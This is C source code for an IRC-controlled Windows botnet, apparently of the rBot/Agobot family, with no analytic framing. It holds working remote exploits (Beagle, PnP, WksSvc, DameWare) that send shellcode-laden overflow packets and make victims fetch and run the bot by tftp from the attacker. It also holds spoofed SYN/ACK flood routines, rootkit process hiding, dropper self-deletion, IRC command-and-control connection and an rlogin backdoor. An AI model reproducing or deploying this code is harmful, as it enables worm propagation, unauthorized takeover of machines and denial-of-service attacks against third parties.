BOOL Beagle(EXINFO exinfo) { char *BeagleAuth, buffer[IRCLINE], botfile[MAX_PATH], fname[_MAX_FNAME], ext[_MAX_EXT]; BOOL success = FALSE; WSADATA WSAData; if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0) return FALSE; SOCKET sSock; if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) { SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(exinfo.ip); ssin.sin_port = fhtons(exinfo.port); if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) { BeagleAuth = ((strcmp(exinfo.command, "beagle1") == 0)?(BeagleAuth1):(BeagleAuth2)); if(fsend(sSock, BeagleAuth, sizeof(BeagleAuth), 0) != SOCKET_ERROR) { if (frecv(sSock, buffer, 8, 0) != SOCKET_ERROR) { GetModuleFileName(0, botfile, sizeof(botfile)); _splitpath(botfile, NULL, NULL, fname, ext); _snprintf(botfile, sizeof(botfile), "%s%s", fname, ext); _snprintf(buffer,sizeof(buffer),"http://%s:%s/%s", GetIP(sSock), httpport, botfile); if(fsend(sSock, buffer, sizeof(buffer), 0)) success = TRUE; } } } } fclosesocket(sSock); fWSACleanup(); if (success) { _snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); exploit[exinfo.exploit].stats++; } return (success); }
BOOL PnP( char *target, void* conn, EXINFO exinfo, int OffNum ) { SOCKADDR_IN addr; int len; int sockfd; unsigned short smblen; char tmp[1024]; unsigned char packet[4096]; unsigned char *ptr; char recvbuf[4096]; IRC* irc=(IRC*)conn; BOOL success=FALSE; char* thisTarget; int pnpbindsize=405; int TargetOS, Target; char* tOS=""; WSADATA wsa; fWSAStartup(MAKEWORD(2,0), &wsa); if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE; thisTarget = exinfo.ip; TargetOS=FpHost(thisTarget,FP_NP); if (TargetOS==OS_UNKNOWN) TargetOS=FpHost(thisTarget,FP_SMB); if (TargetOS == OS_WINNT){ Target=OS_WINNT; success=FALSE; }else if (TargetOS==OS_WINXP){ Target=OS_WINXP; success=FALSE; }else if (TargetOS==OS_WIN2K){ Target=OS_WIN2K; success=TRUE; }else{ success=FALSE; } ZeroMemory(&addr,sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = finet_addr(thisTarget); addr.sin_port = fhtons((unsigned short)exinfo.port); if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE; if (fsend(sockfd, (const char *)SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; if (fsend(sockfd, (const char *)SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if (len <= 10) return FALSE; if (fsend(sockfd, (const char *)SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; ptr = packet; memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1); ptr += sizeof(SMB_TreeConnectAndX)-1; sprintf(tmp,"\\\\%s\\IPC$",thisTarget); convert_name((char *)ptr, tmp); smblen = strlen(tmp)*2; ptr += smblen; smblen += 9; memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1); memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1); ptr += sizeof(SMB_TreeConnectAndX_)-1; smblen = ptr-packet; smblen -= 4; memcpy(packet+3, &smblen, 1); if (fsend(sockfd, (char *)packet, ptr-packet, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; if (fsend(sockfd, (char *)SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; if (fsend(sockfd, (char *)SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; // nop ptr = packet; memset(packet, '\x90', sizeof(packet)); // Start prepare header -- dETOX mod -- memcpy(RPC_call + 260, Offsets[OffNum], 4); // header & offsets memcpy(ptr, RPC_call, sizeof(RPC_call)-1); ptr += sizeof(RPC_call)-1; // shellcode unsigned short port; port = fhtons(bindport)^(USHORT)0x9999; memcpy(&bindshell[176],&port,2); memcpy(ptr,bindshell,pnpbindsize-1); // end of packet memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1); // sending... if (fsend(sockfd, (char *)packet, 2196, 0) < 0) return FALSE; frecv(sockfd, recvbuf, 4096, 0); if (!exinfo.silent && exinfo.verbose){ switch(Target){ case 1: tOS="WINNT"; break; case 2: tOS="WIN2K"; break; case 3: tOS="WINXP"; break; default: tOS="UNKNOWN/2K3/LINUX"; break; } irc->privmsg(target,"%s %s: Target OS is %s... (%s).", scan_title, exploit[exinfo.exploit].name, tOS, exinfo.ip); } // if(success){ Sleep(2000); if (ConnectShell(exinfo,bindport)) { if (!exinfo.silent) irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); exploit[exinfo.exploit].stats++; } else if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); // } return TRUE; }
DWORD WINAPI Bthd(LPVOID param) { for (int m=0;m<6;m++) { if(!(xetum=CreateMutex(NULL, FALSE, xetumhandle))) Sleep(5000); else break; } if (WaitForSingleObject(CreateMutex(NULL, TRUE, xetumhandle), 30000) == WAIT_TIMEOUT) ExitProcess(0); addthread(MAIN_THREAD,str_main_thread,main_title); srand(GetTickCount()); dwstarted=GetTickCount(); WSADATA wsadata; if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0) ExitProcess(-2); int i=0; DWORD id=0; char *ip; char hostname[256]; struct hostent *h; fgethostname(hostname, 256); h = fgethostbyname(hostname); ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]); strncpy(inip,ip,sizeof(inip)); curserver=0; HookProtocol(&mainirc); while (mainirc.should_connect()) { if (!mainirc.is_connected()) { #ifdef _DEBUG printf("Trying to connect to: %s:%i\r\n",sinfo[curserver].host,sinfo[curserver].port); #endif #ifndef NO_FLUSHDNS FlushDNSCache(); #endif mainirc.start(sinfo[curserver].host,sinfo[curserver].port, mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN), mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),sinfo[curserver].pass); mainirc.message_loop(); } else mainirc.message_loop(); Sleep(SFLOOD_DELAY); if (curserver==(srvsz-1)) curserver=0; else curserver++; } // cleanup; //killthreadall(); fWSACleanup(); ReleaseMutex(xetum); ExitThread(0); return TRUE; }
DWORD WINAPI RlogindThread(LPVOID param) { RLOGIND rlogind = *((RLOGIND *)param); RLOGIND *rloginds = (RLOGIND *)param; rloginds->gotinfo = TRUE; char sendbuf[IRCLINE]; int csin_len, Err; unsigned long mode = 1; WSADATA WSAData; SECURITY_ATTRIBUTES SecurityAttributes; DWORD id; if ((Err = fWSAStartup(MAKEWORD(2,2), &WSAData)) != 0) { addlogv("[RLOGIND]: Error: WSAStartup(): <%d>.", Err); clearthread(rlogind.threadnum); ExitThread(1); } if (!SetConsoleCtrlHandler((PHANDLER_ROUTINE)&CtrlHandler, TRUE)) { addlogv("[RLOGIND]: Failed to install control-C handler, error: <%d>.", GetLastError()); fWSACleanup(); clearthread(rlogind.threadnum); ExitThread(1); } SOCKET ssock, csock; SOCKADDR_IN csin, ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons(rlogind.port); ssin.sin_addr.s_addr = INADDR_ANY; if ((ssock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) { threads[rlogind.threadnum].sock = ssock; if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) == 0) { if (flisten(ssock, SOMAXCONN) == 0) { SecurityAttributes.nLength = sizeof(SecurityAttributes); SecurityAttributes.lpSecurityDescriptor = NULL; SecurityAttributes.bInheritHandle = FALSE; addlog("[RLOGIND]: Ready and waiting for incoming connections."); BOOL flag = TRUE; while (1) { csin_len = sizeof(csin); if ((csock = faccept(ssock, (LPSOCKADDR)&csin, &csin_len)) == INVALID_SOCKET) break; if (fsetsockopt(csock, SOL_SOCKET, SO_KEEPALIVE,(char *)&flag,flag) != SOCKET_ERROR) { rlogind.gotinfo = FALSE; sprintf(sendbuf,"[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.", finet_ntoa(csin.sin_addr), fntohs(csin.sin_port), rlogind.threadnum); addlog(sendbuf); rlogind.cthreadnum = addthread(sendbuf,RLOGIN_THREAD,csock); threads[rlogind.cthreadnum].parent = rlogind.threadnum; if (threads[rlogind.cthreadnum].tHandle = CreateThread(&SecurityAttributes,0,&RlogindClientThread,(LPVOID)&rlogind,0,&id)) { while (rlogind.gotinfo == FALSE) Sleep(50); } else { addlogv("[RLOGIND]: Failed to start client thread, error: <%d>.", GetLastError()); break; } } } } } } sprintf(sendbuf, "[RLOGIND]: Error: server failed, returned: <%d>.", fWSAGetLastError()); if (!rlogind.silent) irc_privmsg(rlogind.sock, rlogind.chan, sendbuf, rlogind.notice); addlog(sendbuf); fclosesocket(csock); fclosesocket(ssock); fWSACleanup(); clearthread(rlogind.threadnum); ExitThread(0); }
BOOL WksSvc(EXINFO exinfo) { char sendbuf[IRCLINE]; char WksFile[MAX_PATH]; char cmd[500]; // Feel the wrath of my spontaneous comments SOCKET sock; char overwrite[2045] = ""; char exp_buf[2045+4+16+501]; char ip[30]; LPWSTR ipl[60]; DWORD jmpesp = 0x7518A747; //LPWSTR unicodesp0[(2045+4+16+501)*2]; char unicode[(2045+4+16+501)*2]; int z = 0; int x = 0; int len = 0; HINSTANCE hinstLib; MYPROC ProcAddr; BOOL fRunTimeLinkSuccess = FALSE; WSADATA wsaData; if (fWSAStartup(MAKEWORD(2, 0), &wsaData)) return 0; GetModuleFileName(0, WksFile, sizeof(WksFile)); // Will contain path + filename? :x // Lets build our request... Seeing as our shellcode binds us a shell, tftp is easy ;O _snprintf(cmd,sizeof(cmd), "tftp -i %s get %s" "&start %s&wank\n", GetIP(exinfo.sock),WksFile,WksFile); _snprintf(ip, 24, "\\\\%s", exinfo.ip); memset(overwrite, 0x41, 2000); memset(overwrite+2000, 0x90, 44); memcpy(exp_buf, overwrite, 2044); memcpy(exp_buf+2044, &jmpesp, 4); memset(exp_buf+2048, 0x90, 16); memcpy(exp_buf+2064, sc, sizeof(sc)); // Small problem, SP0 or SP1? (Trying an incorrect one will probably crash the target machine, so its one or the other :P) // SP1 for now, seems more popular. memset(unicode, 0x00, sizeof(unicode)); for (x = 0, z = 0; z <= sizeof(unicode); x++, z+=2) { unicode[z] = exp_buf[x]; } /* - SP0 Code len = MultiByteToWideChar(CP_ACP, NULL, exp_buf, sizeof(exp_buf), (unsigned short *)unicodesp0,sizeof(unicodesp0)); */ hinstLib = LoadLibrary("netapi32.dll"); // FIX ME: This is already loaded @ functions.h/loaddlls.cpp? MultiByteToWideChar(CP_ACP, NULL, ip, 30, (unsigned short*)ipl, 60); ProcAddr = (MYPROC) GetProcAddress(hinstLib,"NetAddAlternateComputerName"); if (NULL != ProcAddr) { fRunTimeLinkSuccess = TRUE; (ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicode,NULL,NULL,0); // Run NAACN with our nasty settings :O /* (ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicodesp0,NULL,NULL,0); */ } else { return FALSE; } // Exploit sent, lets check if they left us a shell :) Sleep(1000); // Testing only (May not be needed) // Lame old Thunderstorm socket checker. if((sock=WksSocket(3, 4444, exinfo.ip)) != -1) { // Send our TFTP/FTP request fsend(sock, cmd, strlen(cmd), 0); unsigned int nReadBytes; char received[1000]; while(1) { // Take a Break. Sleep(1000); unsigned long ul[2]; ul[0]=1; ul[1]=sock; struct timeval timeout; timeout.tv_sec=1; timeout.tv_usec=0; int l=fselect(0, (fd_set *)&ul, 0,0, &timeout); if ((l==1)) { if((nReadBytes = frecv(sock, received, sizeof(received), 0))!= SOCKET_ERROR && nReadBytes!=0) { received[nReadBytes]=0x00; if(strstr(received, "not recognized")) break; } } } } else { return FALSE; // (The shell either hasn't arrived or has crashed, so we quit.) } sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip); for (int i=0; i < 6; i++) { if (searchlog(sendbuf)) { sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice); addlog(sendbuf); exploit[exinfo.exploit].stats++; break; } Sleep(5000); } fclosesocket(sock); return TRUE; }
long SendDDOS(unsigned long TargetIP, unsigned int SpoofingIP, char *Type, unsigned short TargetPort, int len) { WSADATA WSAData; SOCKET sock; SOCKADDR_IN addr_in; IPHEADER ipHeader; TCPHEADER tcpHeader; PSDHEADER psdHeader; LARGE_INTEGER freq, halt_time, cur; char szSendBuf[60]={0},buf[64]; int rect; if (fWSAStartup(MAKEWORD(2,2), &WSAData)!=0) return FALSE; if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED )) == INVALID_SOCKET) { fWSACleanup(); return FALSE; } BOOL flag=TRUE; if (fsetsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) { fclosesocket(sock); fWSACleanup(); return FALSE; } addr_in.sin_family=AF_INET; addr_in.sin_port=fhtons((unsigned short)TargetPort); addr_in.sin_addr.s_addr=TargetIP; ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); ipHeader.ident=1; ipHeader.frag_and_flags=0; ipHeader.ttl=128; ipHeader.proto=IPPROTO_TCP; ipHeader.checksum=0; ipHeader.destIP=TargetIP; tcpHeader.dport=fhtons((unsigned short)TargetPort); tcpHeader.sport=fhtons((unsigned short)rand()%1025); tcpHeader.seq=fhtonl(0x12345678); /* A SYN attack simply smash its target up with TCP SYN packets. Each SYN packet needs a SYN-ACK response and forces the server to wait for the good ACK in reply. Of course, we just never gives the ACK, since we use a bad IP address (spoof) there's no chance of an ACK returning. This quickly kills a server as it tries to send out SYN-ACKs while waiting for ACKs. When the SYN-ACK queues fill up, the server can no longer take any incoming SYNs, and that's the end of that server until the attack is cleared up.*/ if (strcmp(Type,"ddos.syn") == 0) { tcpHeader.ack_seq=0; tcpHeader.flags=SYN; } else if (strcmp(Type,"ddos.ack") == 0) { tcpHeader.ack_seq=0; tcpHeader.flags=ACK; } else if (strcmp(Type,"ddos.random") == 0) { tcpHeader.ack_seq=rand()%3; if (rand()%2 == 0) tcpHeader.flags=SYN; else tcpHeader.flags=ACK; } tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); tcpHeader.window=fhtons(16384); tcpHeader.urg_ptr=0; long total = 0; QueryPerformanceFrequency(&freq); QueryPerformanceCounter(&cur); halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart; while(TRUE) { tcpHeader.checksum=0; tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000)); tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand())); ipHeader.sourceIP=fhtonl(SpoofingIP++); psdHeader.daddr=ipHeader.destIP; psdHeader.zero=0; psdHeader.proto=IPPROTO_TCP; psdHeader.length=fhtons(sizeof(tcpHeader)); psdHeader.saddr=ipHeader.sourceIP; memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&addr_in, sizeof(addr_in)); if (rect==SOCKET_ERROR) { sprintf(buf, "[DDoS]: Send error: <%d>.",fWSAGetLastError()); addlog(buf); fclosesocket(sock); fWSACleanup(); return 0; } total += rect; QueryPerformanceCounter(&cur); if (cur.QuadPart >= halt_time.QuadPart) break; } fclosesocket(sock); fWSACleanup(); return (total); }
long SendSyn(unsigned long TargetIP, unsigned int SpoofingIP, unsigned short TargetPort, int len) { IPHEADER ipHeader; TCPHEADER tcpHeader; PSDHEADER psdHeader; LARGE_INTEGER freq, halt_time, cur; char szSendBuf[60]={0},buf[64]; int rect; WSADATA WSAData; if (fWSAStartup(MAKEWORD(2,2), &WSAData) != 0) return FALSE; SOCKET sock; if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) { fWSACleanup(); return FALSE; } BOOL flag=TRUE; if (fsetsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) { fclosesocket(sock); fWSACleanup(); return FALSE; } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=fhtons(TargetPort); ssin.sin_addr.s_addr=TargetIP; ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); ipHeader.ident=1; ipHeader.frag_and_flags=0; ipHeader.ttl=128; ipHeader.proto=IPPROTO_TCP; ipHeader.checksum=0; ipHeader.destIP=TargetIP; tcpHeader.dport=fhtons(TargetPort); tcpHeader.ack_seq=0; tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); tcpHeader.flags=2; tcpHeader.window=fhtons(16384); tcpHeader.urg_ptr=0; long total = 0; QueryPerformanceFrequency(&freq); QueryPerformanceCounter(&cur); halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart; while (1) { tcpHeader.checksum=0; tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000)); tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand())); ipHeader.sourceIP=fhtonl(SpoofingIP++); psdHeader.daddr=ipHeader.destIP; psdHeader.zero=0; psdHeader.proto=IPPROTO_TCP; psdHeader.length=fhtons(sizeof(tcpHeader)); psdHeader.saddr=ipHeader.sourceIP; memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin)); if (rect==SOCKET_ERROR) { sprintf(buf, "[SYN]: Send error: <%d>.",fWSAGetLastError()); addlog(buf); fclosesocket(sock); fWSACleanup(); return 0; } total += rect; QueryPerformanceCounter(&cur); if (cur.QuadPart >= halt_time.QuadPart) break; } fclosesocket(sock); fWSACleanup(); return (total); }
DWORD WINAPI BotThread(LPVOID param) { for (int m=0;m<6;m++) { if(!(mutex=CreateMutex(NULL, FALSE, mutexhandle))) Sleep(5000); else break; } // if (WaitForSingleObject(CreateMutex(NULL, TRUE, mutexhandle), 30000) == WAIT_TIMEOUT) // ExitProcess(0); addthread(MAIN_THREAD,str_main_thread,main_title); #ifndef _DEBUG #ifndef NO_MELT char *melt=RegQuery(meltkey.hkey,meltkey.subkey,meltkey.name); if (melt) { SetFileAttributes(melt,FILE_ATTRIBUTE_NORMAL); int tries=0; while (FileExists(melt) && tries<3) { DeleteFile(melt); tries++; Sleep(2000); } RegDelete(meltkey.hkey,meltkey.subkey,meltkey.name); } #endif // NO_MELT #endif // _DEBUG srand(GetTickCount()); dwstarted=GetTickCount(); #ifndef NO_VERSION_REPLY curversion=rand()%(versionsize); #ifdef _DEBUG printf("Generated current_version: %d (%d), %s.\n",curversion,versionsize,versionlist[curversion]); #endif #endif WSADATA wsadata; if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0) ExitProcess(-2); #ifndef _DEBUG #ifndef NO_FCONNECT char readbuf[1024]; HINTERNET httpopen, openurl; DWORD read; httpopen=fInternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0); openurl=fInternetOpenUrl(httpopen,cononstart,NULL,NULL,INTERNET_FLAG_RELOAD|INTERNET_FLAG_NO_CACHE_WRITE,NULL); if (!openurl) { fInternetCloseHandle(httpopen); fInternetCloseHandle(openurl); } fInternetReadFile(openurl,readbuf,sizeof(readbuf),&read); fInternetCloseHandle(httpopen); fInternetCloseHandle(openurl); #endif // NO_FCONNECT #endif // _DEBUG #ifndef NO_INSTALLED_TIME if (!noadvapi32) GetInstalledTime(); else sprintf(installedt,"Error"); #endif // NO_INSTALLED_TIME int i=0; DWORD id=0; #ifndef NO_RECORD_UPTIME i=addthread(RUPTIME_THREAD,str_rup_thread,main_title); threads[i].tHandle=CreateThread(NULL,0,&RecordUptimeThread,0,0,&id); #endif // NO_RECORD_UPTIME #ifndef NO_AUTO_SECURE #ifndef NO_SECURE NTHREAD secure; secure.bdata2=TRUE;//loop i=addthread(SECURE_THREAD,str_asecure_thread,sec_title); threads[i].tHandle=CreateThread(NULL,0,&SecureThread,(LPVOID)&secure,0,&id); #endif #endif // NO_AUTO_SECURE #ifndef NO_RDRIV #ifndef _DEBUG rkenabled=InitRK();//initialize fu if (rkenabled) HideMe();//hide the process #endif // _DEBUG #endif // NO_RDRIV #ifndef _DEBUG // maybe this will give the shutdown handler time to work RegWrite(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control","WaitToKillServiceTimeout","7000"); #endif //get internal ip char *ip; char hostname[256]; struct hostent *h; fgethostname(hostname, 256); h = fgethostbyname(hostname); ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]); strncpy(inip,ip,sizeof(inip)); curserver=0; HookProtocol(&mainirc); while (mainirc.should_connect()) { if (!mainirc.is_connected()) { #ifdef _DEBUG printf("Trying to connect to: %s:%i\r\n",servers[curserver].host,servers[curserver].port); #endif #ifndef NO_FLUSHDNS FlushDNSCache(); #endif mainirc.start(servers[curserver].host,servers[curserver].port, mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN), mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),servers[curserver].pass); mainirc.message_loop(); } else mainirc.message_loop(); Sleep(SFLOOD_DELAY); if (curserver==(serversize-1)) curserver=0; else curserver++; } // cleanup; killthreadall(); fWSACleanup(); ReleaseMutex(mutex); ExitThread(0); }
BOOL DameWare(EXINFO exinfo) { char buffer[IRCLINE], szRecvBuf[5096], szReqBuf[5096]; int os_sp=0, os_ver=check_os((char*)exinfo.ip,exinfo.port,&os_sp); BOOL bRet = FALSE; WSADATA WSAData; if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0) return FALSE; // Build a buffer with the shellcode memcpy(szReqBuf,"\x10\x27",2); memset(szReqBuf+0xc4+9,0x90,500); *(unsigned long*)&szReqBuf[516] = target_os[os_ver].sp[os_sp].eip; memcpy(szReqBuf+520, phatty_rshell, strlen(phatty_rshell) ); memcpy(szReqBuf+1042, "neTmaNiac", 9 ); memcpy(szReqBuf+0x5b4+0x24, "netmaniac was here", 18 ); memcpy(szReqBuf+0x5b4+0x128, "12/12/04 13:13:13", 17 ); memcpy(szReqBuf+0x5b4+0x538, "netninjaz_place", 15 ); memcpy(szReqBuf+0x5b4+0x5b4+0x88, "131.131.131.131", 16 ); memcpy(szReqBuf+0x5b4+0x5b4+0x394, "3.72.0.0", strlen("3.72.0.0") ); // Connect to the server SOCKET sSock; if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) { SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(exinfo.ip); ssin.sin_port = fhtons((unsigned short)exinfo.port); if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) { _snprintf(buffer, sizeof(buffer), "[%s]: Connected to %s\r\n", exploit[exinfo.exploit].name, GetIP(sSock)); irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); TIMEVAL timeout; timeout.tv_sec = 5; timeout.tv_usec = 0; fd_set fd; FD_ZERO(&fd); FD_SET(sSock, &fd); if (fselect(0, &fd, NULL, NULL, &timeout) > 0) { memset(szRecvBuf, 0, sizeof(szRecvBuf)); if (frecv(sSock,(char *)szRecvBuf,sizeof(szRecvBuf),0) > 0) { memset(szRecvBuf,0,sizeof(szRecvBuf)); Sleep(500); if (fsend(sSock,(char *)send_buff,strlen((char *)send_buff),0) > 0) { irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); Sleep(2000); if (frecv(sSock,(char *)szRecvBuf, sizeof(szRecvBuf),0) > 0) { irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); Sleep(500); if(fsend(sSock,(char *)szReqBuf,strlen((char *)szReqBuf),0) > 0) { Sleep(10000); fclosesocket(sSock); memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(exinfo.ip); ssin.sin_port = fhtons((unsigned short)1981); if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) { char cmd_buff[400]; _snprintf(cmd_buff,sizeof(cmd_buff), "tftp -i %s get %s\n" "%s\n", GetIP(exinfo.sock),filename, filename); if(frecv(exinfo.sock, szRecvBuf, sizeof(szRecvBuf), 0) > 0) { Sleep(500); if(fsend(sSock,(char*)cmd_buff, strlen(cmd_buff),0) > 0) { fclosesocket(sSock); _snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); bRet = TRUE; } } } } } } } } } fclosesocket(sSock); } return (bRet); }